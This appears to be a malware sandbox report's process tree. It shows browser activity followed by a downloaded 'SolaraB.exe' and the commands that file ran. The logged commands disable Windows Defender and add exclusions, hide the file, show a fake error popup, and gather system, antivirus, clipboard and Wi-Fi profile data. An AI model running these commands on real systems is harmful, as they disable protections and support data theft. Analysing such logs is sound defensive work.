  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa0b6fcc40,0x7ffa0b6fcc4c,0x7ffa0b6fcc58
  2⤵
  PID:4252
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1996,i,1969151054338532924,14897285034194590948,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1992 /prefetch:2
  2⤵
  PID:548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1848,i,1969151054338532924,14897285034194590948,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2144 /prefetch:3
  2⤵
  PID:4852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,1969151054338532924,14897285034194590948,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2200 /prefetch:8
  2⤵
  PID:2092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,1969151054338532924,14897285034194590948,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3240 /prefetch:1
  2⤵
  PID:2728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,1969151054338532924,14897285034194590948,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3284 /prefetch:1
  2⤵
  PID:5116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3568,i,1969151054338532924,14897285034194590948,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4396 /prefetch:1
  2⤵
  PID:1444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4584,i,1969151054338532924,14897285034194590948,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4800 /prefetch:8
  2⤵
  PID:3048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4836,i,1969151054338532924,14897285034194590948,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4564 /prefetch:8
  2⤵
  PID:668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4420,i,1969151054338532924,14897285034194590948,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4848 /prefetch:1
  2⤵
  PID:3232

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa18ca3cb8,0x7ffa18ca3cc8,0x7ffa18ca3cd8
  2⤵
  PID:4800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1980 /prefetch:2
  2⤵
  PID:2620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
  2⤵
  PID:1084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1
  2⤵
  PID:5020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
  2⤵
  PID:2364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:1
  2⤵
  PID:4508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
  2⤵
  PID:792
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3312 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4512 /prefetch:1
  2⤵
  PID:2200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
  2⤵
  PID:1772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
  2⤵
  PID:3232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
  2⤵
  PID:984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5396 /prefetch:8
  2⤵
  PID:3352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5128 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5744 /prefetch:8
  2⤵
  PID:2740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
  2⤵
  PID:5020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4844 /prefetch:1
  2⤵
  PID:576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
  2⤵
  PID:1588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
  2⤵
  PID:1428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
  2⤵
  PID:3348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4732 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6620 /prefetch:1
  2⤵
  PID:692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5988 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1708 /prefetch:1
  2⤵
  PID:660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1416 /prefetch:1
  2⤵
  PID:3460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:3212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
  2⤵
  PID:3364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6984 /prefetch:8
  2⤵
  PID:2984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1936,4589380264030817629,3687142426027526852,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7296 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1620
- C:\Users\Admin\Downloads\SolaraB.exe
  "C:\Users\Admin\Downloads\SolaraB.exe"
  2⤵
  - Executes dropped EXE
  PID:5660
- - C:\Users\Admin\Downloads\SolaraB.exe
    "C:\Users\Admin\Downloads\SolaraB.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\SolaraB.exe'"
      4⤵
      PID:5952
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\SolaraB.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5260
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:5960
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5288
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('system not support if you think this is wrong message support', 0, 'error 202', 48+16);close()""
      4⤵
      PID:5968
    - - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('system not support if you think this is wrong message support', 0, 'error 202', 48+16);close()"
        5⤵
        
        PID:5204
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:6008
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:2500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:6124
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5172
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
      4⤵
      PID:5392
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        5⤵
        
        PID:5440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
      4⤵
      PID:4512
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        5⤵
        
        PID:5476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5496
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5624
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:3608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\SolaraB.exe""
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:5648
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\Downloads\SolaraB.exe"
        5⤵
        Views/modifies file attributes
        
        PID:2452
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‍.scr'"
      4⤵
      PID:3644
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‍.scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4952
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5828
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5088
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5848
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:6136
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:5776
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:5992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:5348
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:1620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5064
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:5264
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5304
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5244
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:5268
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:4128
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      4⤵
      PID:5956
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        5⤵
        
        PID:5648
  - - C:\Windows\system32\cmd.exe
